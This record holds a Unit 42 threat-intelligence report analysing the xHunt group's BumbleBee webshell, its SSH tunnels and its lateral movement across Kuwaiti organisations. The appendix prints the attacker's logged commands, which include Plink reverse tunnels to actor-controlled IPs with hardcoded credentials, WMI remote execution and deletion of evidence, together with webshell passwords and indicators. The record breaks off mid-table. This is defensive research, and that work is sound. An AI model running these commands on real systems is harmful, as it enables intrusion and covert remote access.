{ "id": "2b666d02-6053-4b56-a18a-4da568b451e6", "created_at": "2026-04-06T00:09:38.097515Z", "updated_at": "2026-04-10T03:31:42.207203Z", "deleted_at": null, "sha1_hash": "6ec2a1f5631f6c6dfc4e1ad3c7de7e90b998a7a5", "title": "xHunt Campaign: New BumbleBee Webshell and SSH Tunnels Used for Lateral Movement", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 301620, "plain_text": "xHunt Campaign: New BumbleBee Webshell and SSH Tunnels\r\nUsed for Lateral Movement\r\nBy Robert Falcone\r\nPublished: 2021-01-11 · Archived: 2026-04-05 17:26:35 UTC\r\nExecutive Summary\r\nIn September 2020, we began investigating a Microsoft Exchange server at a Kuwaiti organization that a threat\r\ngroup compromised as part of a continued xHunt campaign. This investigation resulted in the discovery of two\r\nnew backdoors called TriFive and Snugy, which we discussed in a prior blog, as well as a new webshell that we\r\ncall BumbleBee that we will explain in greater detail in this blog. We use this name because the color scheme of\r\nthe BumbleBee webshell includes white, black and yellow, as seen in Figure 1.\r\nThe actor used the BumbleBee webshell to upload and download files to and from the compromised Exchange\r\nserver, but more importantly, to run commands that the actor used to discover additional systems and to move\r\nlaterally to other servers on the network. We found BumbleBee hosted on an internal Internet Information Services\r\n(IIS) web server on the same network as the compromised Exchange server, as well as on two internal IIS web\r\nservers at two other Kuwaiti organizations. As mentioned in our prior xHunt Campaign blog, we still do not know\r\nthe initial infection vector used to compromise the Exchange server, as this appears to have occurred prior to the\r\nlogs we were able to collect.\r\nWe observed the actor interacting directly with the BumbleBee webshell on the compromised Exchange server of\r\nthe Kuwaiti organization, as this server was accessible from the internet. The actor used Virtual Private Networks\r\n(VPNs) provided by Private Internet Access when directly accessing BumbleBee on internet-accessible servers.\r\nThe actor would frequently switch between different VPN servers to change the external IP address of the activity\r\nthat the server would store in the logs. Specifically, the actor changed the IP address to appear to be from different\r\ncountries, including Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden\r\nand the United Kingdom. We believe this is an attempt to evade detection and make analysis of the malicious\r\nactivities more difficult. We also observed the actor switching between different operating systems and browsers,\r\nspecifically Mozilla Firefox or Google Chrome on Windows 10, Windows 8.1 or Linux systems. This suggests the\r\nactor has access to multiple systems and uses this to make analysis of the activities more difficult, or that there are\r\nmultiple actors involved, who have differing preferences for operating systems and browsers.\r\nIn addition to using VPNs, the actor used SSH tunnels to interact with BumbleBee webshells hosted on internal\r\nIIS web servers that are not accessible directly from the internet at all three Kuwaiti organizations. The commands\r\nexecuted on the servers via BumbleBee suggest that the actor used the PuTTY Link (Plink) tool to create SSH\r\ntunnels to access services internal to the compromised network. We observed the actor using Plink to create an\r\nSSH tunnel for TCP port 3389, which suggests that the actor used the tunnel to access the system using Remote\r\nDesktop Protocol (RDP). We also observed the actor creating SSH tunnels to internal servers for TCP port 80,\r\nwhich suggests the actor used the tunnel to access internal IIS web servers. We believe that the actor accessed\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 1 of 17\n\nthese additional internal IIS web servers to leverage file uploading functionality in internal web applications to\r\ninstall BumbleBee as a method of lateral movement.\r\nPalo Alto Networks Next-Generation Firewall customers are protected from these xHunt-related attacks with\r\nThreat Prevention, URL Filtering and DNS Security subscriptions.\r\nBumbleBee Webshell\r\nThe threat group involved in the xHunt campaign compromised an Exchange server at a Kuwaiti organization and\r\ninstalled a webshell that we call BumbleBee. We call the webshell BumbleBee because the color scheme of the\r\nwebshell includes white, black and yellow, as seen in Figure 1. BumbleBee is pretty straightforward. It allows an\r\nattacker to execute commands and upload and download files to and from the server. The interesting part of\r\nBumbleBee is that it requires an actor to supply one password to view the webshell and a second password to\r\ninteract with the webshell.\r\nFigure 1. BumbleBee webshell used by xHunt actor to run commands on Microsoft Exchange\r\nServer.\r\nTo view the BumbleBee webshell, the actor must provide a password in a URL parameter named parameter.\r\nOtherwise, the form used to interact with BumbleBee will not display in the browser. To check the supplied\r\npassword for authentication, the webshell will generate an MD5 hash of the parameter value and check it with a\r\nhardcoded MD5 hash, which in the BumbleBee sample hosted on the compromised Exchange server we observed\r\nwas an MD5 hash of 1B2F81BD2D39E60F1E1AD05DD3BF9F56 for the password string fkeYMvKUQlA5asR.\r\nOnce displayed, BumbleBee provides the actor three main functionalities:\r\n1. Executing commands via cmd /c\r\n2. Uploading files to the server to a specified folder (c:\\windows\\temp by default).\r\n3. Download files from the server.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 2 of 17\n\nTo carry out any of these functions, the actor must supply a second password (in the field with the added\r\n“password” label in Figure 1). The BumbleBee webshell will generate an MD5 hash of the password and check it\r\nwith a hardcoded MD5 hash before carrying out the functionality. The MD5 hash checked prior to carrying out the\r\nactor’s desired actions was 36252C6C2F616C5664A54058F33EF463, but we were unfortunately unable to\r\ndetermine the string form of this password. While we did not know the password required to use BumbleBee’s\r\nfunctionality, we were able to determine the commands executed via the webshell by analyzing logs from the\r\ncompromised Exchange server, which we will discuss in detail in a later section of this blog.\r\nWhile carrying out our analysis, we found a second BumbleBee webshell that contained different MD5 hashes for\r\nviewing the webshell and executing commands, which were A2B4D934D394B54672EA10CA8A65C198 and\r\n28D968F26028D956E6F1199092A1C408, respectively. We determined that the hash of\r\nA2B4D934D394B54672EA10CA8A65C198 was for the password TshuYoOARg3fndI, but we were unable to\r\ndetermine the string for the second hash. This webshell was hosted at an internal IIS web server at the same\r\nKuwaiti organization where the original BumbleBee was found on a compromised Exchange server. We also\r\nfound this specific BumbleBee sample hosted on internal IIS web servers at two other organizations in Kuwait.\r\nWe were able to collect endpoint logs from an internal IIS web server at one of the two Kuwaiti organizations to\r\ndetermine the commands executed via BumbleBee, which we will also discuss in a later section of this blog.\r\nInteractions With Compromised Microsoft Exchange Server\r\nTo determine the actor’s activities regarding the compromised Exchange server of a Kuwaiti organization, we\r\ncollected IIS server logs from the Exchange server and the logs generated for the system by Cortex XDR. Within\r\nthe IIS logs, we were able to observe the HTTP POST requests generated when the actor issued commands via the\r\nBumbleBee webshell installed on the compromised Exchange server. Using the IIS logs, we were also able to\r\nobserve the actor logging into a compromised email account via Outlook Web App and carrying out specific\r\nactivities once logged in, such as viewing emails and searching for other email accounts on the compromised\r\nnetwork.\r\nUnfortunately, the compromised Exchange server cannot log the data within the POST requests, so while we know\r\nhow many commands were issued from these logs, we do not know the actual commands that the actor executed.\r\nAlso, we were only able to collect 34 days’ worth of logs from the period between Jan. 31, 2020, and Sept. 16,\r\n2020, which did not include all the IIS logs from the compromised Exchange server. Due to these large gaps in\r\nlogs, we do not have a complete picture of the activity or even visibility into the beginning of the actor’s\r\ninteractions with the compromised Exchange server. For example, the IIS logs show the first BumbleBee webshell\r\nactivity on Feb. 1, 2020, but they also show the TriFive backdoor logging into a compromised email account every\r\nfive minutes starting at 12:02 AM UTC on Jan. 31, 2020. The TriFive beacons every five minutes suggest it was\r\nrepeatedly running via the scheduled task discussed in our previous blog on the backdoors related to this incident,\r\nwhich also suggests that the actor had already gained sustained access to the compromised Exchange server before\r\nwhat our collected logs show.\r\nUsing the IIS logs we were able to collect from the compromised Exchange server, we were able to put together a\r\ntimeline of the actor’s activity, including interactions with the BumbleBee webshell. On Feb. 1 and July 27, 2020,\r\nthe actor logged into the Exchange server via Outlook Web App using compromised credentials. The actor used\r\nthe search functionality within Outlook Web App to search for email addresses, including searching for the\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 3 of 17\n\ndomain name of the compromised Kuwaiti organization to get a full list of email addresses, as well as specific\r\nkeywords, such as helpdesk. We also saw the actor viewing emails in the compromised account’s inbox,\r\nspecifically emails from service providers and technology vendors. Additionally, the actor viewed alert emails\r\nfrom a Symantec product and Fortinet’s FortiWeb product. The act of searching for emails to the helpdesk and\r\nviewing security alert emails suggests that the threat actor was interested in determining whether the Kuwaiti\r\norganization had become aware of the malicious activities.\r\nIn regard to the BumbleBee webshell activity, the important pieces of information in the IIS logs used to generate\r\na timeline were:\r\nTimestamp of the HTTP requests.\r\nActor’s IP address.\r\nUser-agent in HTTP request provides the actor’s operating system and browser version.\r\nClientId in the URL parameters is a unique identifier for the client provided by the Exchange server via a\r\nserver-side cookie.\r\nTable 1 in the Appendix provides the timeline of activity regarding the actor’s use of the BumbleBee webshell,\r\nwhich began on Feb. 1, 2020, according to the logs we were able to collect. While creating this timeline, we\r\nnoticed a few interesting observables and behaviors exhibited by the actor when interacting with BumbleBee,\r\nincluding:\r\nAll but one of the IP addresses used by the actor are associated with a VPN provided by Private Internet\r\nAccess, with the other IP address belonging to FalcoVPN.\r\nThe actor switched between VPN servers in different locations to change IP address and to appear to\r\noriginate from different countries, specifically Belgium, Germany, Ireland, Italy, Luxembourg, the\r\nNetherlands, Poland, Portugal, Sweden and the United Kingdom.\r\nThe actor used a combination of operating systems and browsers when interacting with BumbleBee,\r\nspecifically FireFox ( ) or Chrome ( ) on Windows 10 ( ), Windows 8.1 ( ) or\r\nLinux systems ( ).\r\nCommands Executed via BumbleBee\r\nAs we previously mentioned, the compromised Exchange server of a Kuwaiti organization does not log the POST\r\ndata within the IIS logs, so we were unable to extract the commands run on the BumbleBee webshell. However,\r\nwe used overlapping timestamps to correlate the activity in the IIS logs with the command prompt activity seen in\r\nCortex XDR logs to determine the commands executed on the server. Unfortunately, we did not have visibility\r\ninto the commands executed on BumbleBee until Sept. 16, 2020, when Cortex XDR was installed on the\r\ncompromised Exchange server in response to the suspicious activity. We were also able to determine the\r\ncommands run on the BumbleBee webshell hosted on the internal IIS web server at one of the two other Kuwaiti\r\norganizations as well.\r\nBased on the Cortex XDR logs, the actor spent three hours and 37 minutes on Sept. 16, 2020, running commands\r\nvia the BumbleBee webshell installed on the compromised Exchange server. Table 2 in the Appendix shows all the\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 4 of 17\n\ncommands and the MITRE ATT\u0026CK technique identifiers that best describe the activities carried out. The\r\ncommands show the actor:\r\n1. Performing network discovery (T1018) using ping and net group commands, as well as PowerShell\r\n(T1059.001), to find additional computers on the network.\r\n2. Performing account discovery (T1087) using the whoami and quser commands.\r\n3. Determining the system time (T1124) using the W32tm and time commands.\r\n4. Creating an SSH tunnel (T1572) using Plink (RTQ.exe) to a remote host.\r\n5. Using RDP (T1021.001) over the SSH tunnel to control the compromised computer.\r\n6. Laterally moving (T1570) to another system by mounting a shared folder, copying Plink (RTQ.exe) to a\r\nremote system and using Windows Management Instrumentation (WMI) (T1047) to create an SSH tunnel\r\nfor RDP access.\r\n7. Removing evidence of their presence by deleting (T1070.004) BumbleBee after they were done issuing\r\ncommands.\r\nThe commands listed in Table 2 in the Appendix also show the actor using Plink (RTQ.exe) to create an SSH\r\ntunnel to an external IP address 192.119.110[.]194, as seen in the following command:\r\necho y | c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R 0.0.0.0:8081:\u003credacted IP #2\u003e:3389 -l bor -pw\r\n123321 -P 443\r\nThe IP address overlaps with other related infrastructure that we will discuss in a later section of this blog. Most\r\nimportantly, the username and password of bor and 123321 used to create the SSH tunnel overlaps directly with\r\nprior xHunt activity. These exact credentials were listed within the cheat sheet found within the Sakabota tool,\r\nwhich provided an example command that the actor could use to create SSH tunnels using Plink. We believe the\r\nactor used the example command from the cheat sheet as a basis for the commands they used to create the SSH\r\ntunnels via BumbleBee.\r\nThe actor creates these SSH tunnels to connect to non-internet accessible RDP services on the Windows system,\r\nspecifically to use RDP to interact with the compromised system and to use Graphical User Interface (GUI)\r\napplications. The actor also uses these SSH tunnels to move laterally to other systems on the network, specifically\r\nto access internal systems that are not remotely accessible from the internet, as depicted in Figure 2.\r\nFigure 2. Visualization of xHunt actor accessing an internal system from an SSH tunnel created on\r\nthe internet accessible server hosting BumbleBee.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 5 of 17\n\nIn addition to analyzing commands executed on the compromised Exchange server, we also analyzed the\r\ncommands executed on the BumbleBee webshell at an internal IIS web server hosted at one of the two other\r\nKuwaiti organizations. On Sept. 10, 2020, we found that the actor ran several commands to perform network and\r\nuser account discovery. Additionally, the actor used BumbleBee to upload a second webshell with a filename of\r\ncq.aspx. The actor used this second webshell to run a PowerShell script that issued SQL queries to a Microsoft\r\nSQL Server database.\r\nThe actor first issued a SQL query to check the version of SQL server, followed by the actor issuing two\r\nadditional queries that were very specific to the web application running on the IIS web server. The PowerShell\r\nscript used to issue the SQL queries is very similar to scripts that were included in a Microsoft Technet forum post\r\ntitled Running SQL via PowerShell, which suggests the actor may have used this forum post as a basis for the\r\nPowerShell script. We were unable to obtain the second webshell, as the actor deleted it via the BumbleBee\r\nwebshell when they were finished. Table 3 in the Appendix shows the commands executed via BumbleBee on\r\nSept. 10, 2020.\r\nThe logs on the IIS web server hosting the BumbleBee webshell used to issue the commands in Table 3 only\r\nincluded internal IP addresses for the source of the activity. The internal IP addresses suggested this web server\r\nwas not publicly accessible and did not expose the actor’s source IP address. However, all of the attempts to\r\naccess BumbleBee and run the commands in Table 3 had 192.119.110[.]194:8083 as the host in the URL of the\r\nreferrer field within the web server logs. This external IP address in the referrer field suggests that the actor was\r\naccessing BumbleBee via an SSH tunnel. The IP address in the referrer field is also the same as in the command\r\nissued to create the SSH tunnels for RDP access that we observed on the compromised Exchange server, as shown\r\nin Table 2.\r\nFile Uploader and SSH Tunnels\r\nDuring our research, we found a second BumbleBee webshell that was hosted on an internal IIS web server at the\r\ninitial Kuwaiti organization, as well as on internal IIS web servers at two other Kuwaiti organizations. This\r\nBumbleBee webshell had different passwords to view and run commands compared to the first sample we\r\nanalyzed. The second BumbleBee webshell required the actor to include the password TshuYoOARg3fndI within\r\na URL parameter aptly named parameter. As with the initial BumbleBee sample, we do not know the password the\r\nactor must include to be able to run commands on the webshell.\r\nBy analyzing artifacts on the internal IIS web server, we were able to determine that on July 16, 2020, the actor\r\nran similar commands to create SSH tunnels using Plink as those seen in Table 2 in the Appendix. We determined\r\nthe actor executed commands that use the same username and password as seen in the xHunt cheat sheet, but with\r\na different external IP address controlled by the actor, as in the following:\r\n1.exe 142.11.211[.]79 -C -R 0.0.0.0:8080:10.x.x.x:80 -l bor -pw 123321 -P 443\r\nSVROOT.exe 142.11.211[.]79 -C -R 0.0.0.0:8081:10.x.x.x:80 -l bor -pw 123321 -P 443\r\nThese commands differ from those used to create the SSH tunnel on the compromised Exchange server that\r\nallowed the actor to connect to the server using RDP over TCP port 3389. The commands above attempt to create\r\na tunnel to allow the actor to access web servers hosted at other internal servers over TCP port 80. We believe the\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 6 of 17\n\nactor used these SSH tunnels to gain access to web servers on other internal networks with hopes of finding\r\nsimilar file uploading functionality on those servers. If found, we believe the actor would use the file uploading\r\nfunctionality to upload a webshell to compromise the remote server for lateral movement.\r\nWe checked the IIS logs that contained BumbleBee webshell activity and found three external IP addresses within\r\nthe URLs of the referrer field of inbound HTTP requests. The presence of these IP addresses in the referrer field\r\nsuggests that the actor used the SSH tunnels to access the web servers by including the following IP and TCP ports\r\nin the URL field of their browser:\r\n142.11.211[.]79:8080\r\n142.11.211[.]79:8081\r\n91.92.109[.]59:1234\r\n91.92.109[.]59:1255\r\n91.92.109[.]59:1288\r\n91.92.109[.]59:1289\r\n192.119.110[.]194:8083\r\nRelated xHunt Infrastructure\r\nThe inbound requests to the BumbleBee webshell hosted on the compromised Exchange server did not provide\r\nany decent pivot points to other xHunt infrastructure, as all the external IP addresses were of VPN servers the\r\nactor used when interacting with the webshell. Fortunately, we were able to extract known xHunt infrastructure\r\nused as the remote servers for the SSH tunnels that the actor created to access systems via RDP and internal web\r\nservices. The three external servers used for the SSH tunnels were 192.119.110[.]194, 142.11.211[.]79 and\r\n91.92.109[.]59, which provided overlaps with other infrastructure seen in the chart in Figure 3.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 7 of 17\n\nFigure 3. Infrastructure associated with xHunt servers used for SSH tunnels.\r\nThese three IP addresses used for the remote location of the SSH tunnel resolved to the domains\r\nns1.backendloop[.]online\r\nand\r\nns2.backendloop[.]online\r\n. More recently, these two domains have resolved to an IP address of\r\n192.255.166[.]158\r\n, which may suggest that the actor is using a server at this IP address in current operations. The\r\n91.92.109[.]59\r\nIP address also resolved to various subdomains on the following domains, suggesting that they are also part of the\r\nactor’s infrastructure:\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 8 of 17\n\nbackendloop[.]online\r\nbestmg[.]info\r\nwindowsmicrosofte[.]online\r\nThe domain windowsmicrosofte[.]online contains the substring microsofte, which was seen in the Hisoka C2\r\ndomain of microsofte-update[.]com as mentioned in our initial publication on xHunt’s attacks on Kuwaiti shipping\r\nand transportation organizations. Unfortunately, we have not seen any of these domains used by the actor within\r\nour telemetry, so we cannot determine their purpose within the actor’s operations.\r\nConclusion\r\nThe xHunt campaign continues as the actor installed a webshell we call BumbleBee on a compromised Exchange\r\nserver of a Kuwaiti organization, which we found hosted on an internal IIS web server on the same network. We\r\nalso discovered BumbleBee on two internal IIS web servers at two other Kuwaiti organizations as well. While we\r\nknow the actor used the file uploading functionality of a web application to install BumbleBee onto internal IIS\r\nweb servers, we are still unsure if the actor installed BumbleBee on the compromised Exchange server by\r\nexploiting a vulnerability or by moving laterally from another system on the network.\r\nThe actor used BumbleBee to run commands on the compromised servers at the three Kuwaiti organizations,\r\nincluding commands to discover user accounts and other systems on the network, as well as commands to move\r\nlaterally to other systems on the network. Additionally, the actor created SSH tunnels to access systems via RDP\r\nand to access internal web servers from external servers controlled by the actor. The actor used the same username\r\nand password for the SSH tunnels that we observed within the cheat sheet included in the Sakabota tool, which\r\nwas developed and exclusively used by the actor.\r\nThe external servers used by the actor for the SSH tunnels were seen in activity at two of the three Kuwaiti\r\norganizations, which suggests this actor reuses infrastructure when interacting with multiple target networks.\r\nThese external servers also resolved to several related domains, suggesting that they are not only used to establish\r\nSSH tunnels, but used more generally for infrastructure across other portions of their operations.\r\nFrom this analysis, we determined that the actor prefers to use VPNs provided by Private Internet Access when\r\ninteracting directly with the targeted networks to conceal their true location. The actor would also switch VPN\r\nservers often while issuing commands on the webshell to make the activity appear to originate in many different\r\ncountries. The actors also used a VPN when logging into compromised email accounts on the Exchange server of\r\nthe Kuwaiti organization, in which they specifically looked for helpdesk-related emails and emails generated by\r\nsecurity alerts. The attempts to conceal their location and the focus on viewing emails that might notify\r\nadministrators of the compromised network of the attacker’s presence may explain how the actor was able to\r\nmaintain a presence on the compromised network for many months.\r\nPalo Alto Networks Next-Generation Firewall customers are protected from the attacks outlined in this blog with\r\nthe following security subscriptions:\r\nThreat Prevention signatures “BumbleBee Webshell File Detection” and “BumbleBee Webshell Command\r\nand Control Traffic Detection” detects BumbleBee webshell activity.\r\nActor’s related infrastructure has been categorized as malicious in URL Filtering and DNS Security.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 9 of 17\n\nAdditional Resources\r\nxHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for\r\nCommand and Control\r\nxHunt Campaign: New Watering Hole Identified for Credential Harvesting\r\nxHunt Campaign: xHunt Actor’s Cheat Sheet\r\nxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection\r\nxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations\r\nAppendix\r\nIndicators of Compromise\r\n142.11.211[.]79\r\n91.92.109[.]59\r\n192.119.110[.]194\r\n192.255.166[.]158\r\nbackendloop[.]online\r\nbestmg[.]info\r\nwindowsmicrosofte[.]online\r\nBumbleBee Webshell Activity on Exchange Server\r\nTable 1. Actor activity using BumbleBee webshell on compromised Exchange server.\r\nCommands Executed via BumbleBee on Exchange Server\r\nTime\r\n(UTC) on\r\n9/16/2020\r\nCommand Executed ATT\u0026CK IDs\r\n13:42:12 ping -n 1 -a \u003credacted IP #1\u003e T1018\r\n13:42:27 quser /server:dc.\u003credacted root domain\u003e T1087\r\n14:27:39 ipconfig /all T1016\r\n14:27:51 W32tm /query /computer:\u003credacted IP #1\u003e /configuration T1124\r\n14:29:06 W32tm /query /computer:\u003credacted IP #1\u003e /configuration T1124\r\n14:34:25 quser /server:\u003credacted IP #1\u003e T1087\r\n14:36:57\r\necho y | echo q | echo y | echo q | echo y | echo q |echo y | echo q | echo y |\r\necho q | echo y | echo q | time\r\nT1124\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 10 of 17\n\n14:37:11\r\necho y | echo q | echo y | echo q | echo y | echo q |echo y | echo q | echo y |\r\necho q | echo y | echo q | time\r\nT1124\r\n14:43:34 quser /server:\u003credacted IP #1\u003e T1087\r\n14:43:53 quser /server:\u003credacted IP #2\u003e T1087\r\n14:49:14 quser /server:\u003credacted IP #1\u003e T1087\r\n14:49:33 quser \u003credacted username #1\u003e /server:\u003credacted hostname #1\u003e T1087\r\n15:43:13 ipconfig /all T1016\r\n15:43:21 quser /server:\u003credacted IP #1\u003e T1087\r\n15:44:53 dir c:\\windows\\temp\\*.exe T1083\r\n15:45:15\r\necho y | c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R\r\n0.0.0.0:8081:\u003credacted IP #2\u003e:3389 -l bor -pw 123321 -P 443\r\nT1572,\r\nT1021.001\r\n15:45:26 whoami T1033\r\n15:45:32\r\necho y | c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R\r\n0.0.0.0:8081:\u003credacted IP #2\u003e:3389 -l bor -pw 123321 -P 443\r\nT1572,\r\nT1021.001\r\n15:46:11 c:\\windows\\temp\\RTQ.exe T1059.003\r\n15:46:21 whoami /priv T1033\r\n15:48:15 net group \"Domain Computers\" /domain T1069\r\n15:48:35 ping -n 1 \u003credacted hostname #2\u003e T1018\r\n15:49:30\r\nnet use \\\u003credacted IP #3\u003e\\C$ /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e \u003credacted password #1\u003e\r\nT1021.002\r\n15:50:22\r\ncopy c:\\windows\\temp\\RTQ.exe \\\u003credacted IP\r\n#3\u003e\\C$\\windows\\temp\\RTQ.exe\r\nT1560,\r\nT1021.002\r\n15:50:28 \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\RTQ.exe\r\nT1059.003,\r\nT1021.002\r\n15:51:59\r\nwmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd.exe /c c:\\windows\\temp\\RTQ.exe \u003e\u003e C:\\windows\\temp\\r.txt\"\r\nT1047\r\n15:52:22 type \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\r\nT1039,\r\nT1021.002\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 11 of 17\n\n15:53:36\r\nwmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd.exe /c c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R\r\n0.0.0.0:8082:\u003credacted IP #2\u003e:3389 -l bor -pw 123321 -P 443\"\r\nT1047, T1572,\r\nT1021.001\r\n15:55:14\r\nwmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd.exe /c c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R\r\n0.0.0.0:8084:0.0.0.0:3389 -l bor -pw 123321 -P 443\"\r\nT1047, T1572,\r\nT1021.001\r\n15:56:55 del \\\u003credacted IP #3\u003e\\C$:\\windows\\temp\\RTQ.exe\r\nT1070.004,\r\nT1021.002\r\n15:57:03 del \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\RTQ.exe\r\nT1070.004,\r\nT1021.002\r\n15:57:10 del \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\RTQ.exe /F\r\nT1070.004,\r\nT1021.002\r\n15:58:00\r\nwmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd.exe /c del c:\\windows\\temp\\RTQ.exe /F\"\r\nT1047,\r\nT1070.004\r\n15:58:05\r\nwmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd.exe /c del c:\\windows\\temp\\RTQ.exe\"\r\nT1047,\r\nT1070.004\r\n15:58:19 dir \\\u003credacted IP #3\u003e\\C$:\\windows\\temp\\*.exe\r\nT1083,\r\nT1021.002\r\n15:58:25 dir \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\*.exe\r\nT1083,\r\nT1021.002\r\n15:58:38 dir \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\r\nT1083,\r\nT1021.002\r\n15:58:43 del \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\r\nT1070.004,\r\nT1021.002\r\n15:59:25\r\nwmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd.exe /c tasklist \u003e C:\\windows\\temp\\r.txt\"\r\nT1047\r\n15:59:29 type \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\r\nT1039,\r\nT1021.002\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 12 of 17\n\n15:59:48\r\nwmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd.exe /c taskkill /IM \"RTQ.exe\" /F\"\r\nT1047\r\n15:59:55 dir c:\\windows\\temp\\*.exe T1083\r\n15:59:58 dir \\\u003credacted IP #3\u003e\\C$:\\windows\\temp\\*.exe\r\nT1083,\r\nT1021.002\r\n16:00:04 dir \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\*.exe\r\nT1083,\r\nT1021.002\r\n16:00:09 del \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\*.exe\r\nT1083,\r\nT1021.002\r\n16:00:14 dir \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\*.exe\r\nT1083,\r\nT1021.002\r\n16:00:24 del \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\r\nT1070.004,\r\nT1021.002\r\n16:00:29 net use * /DELETE /y\r\nT1070.004,\r\nT1021.002\r\n16:02:48\r\npowershell -c \"Test-NetConnection -ComputerName \u003credacted IP #2\u003e -\r\nPort 80 -InformationLevel \"Detailed\"\r\nT1046,\r\nT1059.001\r\n16:04:36\r\npowershell -c \"Test-NetConnection -ComputerName \u003credacted IP #2\u003e -\r\nPort 3389 -InformationLevel \"Detailed\"\r\nT1046,\r\nT1059.001\r\n16:07:23\r\npowershell -c \"Test-NetConnection -ComputerName \u003credacted IP #2\u003e -\r\nPort 389 -InformationLevel \"Detailed\"\r\nT1046,\r\nT1059.001\r\n16:07:55 quser /server:\u003credacted IP #1\u003e T1087\r\n16:08:42\r\necho y | c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R\r\n0.0.0.0:8081:\u003credacted IP #1\u003e:3389 -l bor -pw 123321 -P 443\r\nT1572,\r\nT1021.001\r\n16:09:03\r\nwmic /node:\"127.0.0.1\" /user:administrator /PASSWORD:\"\u003credacted\r\npassword #2\u003e\" process call create \"cmd.exe /c whoami\"\r\nT1047, T1033\r\n16:09:15 ipconfig/all T1016\r\n16:09:35\r\nwmic /node:\"Exchange\" /user:administrator /PASSWORD:\"\u003credacted\r\npassword #2\u003e\" process call create \"cmd.exe /c whoami\"\r\nT1047, T1033\r\n16:10:35\r\nnet use \\\u003credacted IP #1\u003e\\C$ /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e \u003credacted password #1\u003e\r\nT1021.002\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 13 of 17\n\n16:10:45 quser /server:\u003credacted IP #4\u003e T1087\r\n16:13:17 ipconfig/all T1016\r\n16:13:27\r\nwmic /node:\"\u003credacted IP #1\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd.exe /c c:\\windows\\temp\\RTQ.exe whoami\"\r\nT1047, T1033\r\n16:14:20 type \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\w.txt\r\nT1039,\r\nT1021.002\r\n16:14:30 dir \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\*.txt\r\nT1083,\r\nT1021.002\r\n16:14:56\r\nwmic /node:\"\u003credacted IP #1\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd.exe /c tasklist \u003e c:\\windows\\temp\\ww.txt\"\r\nT1047\r\n16:15:28 dir \\\u003credacted IP #1\u003e\\c$\\windows\\temp\\*txt\r\nT1083,\r\nT1021.002\r\n16:15:36 type \\\u003credacted IP 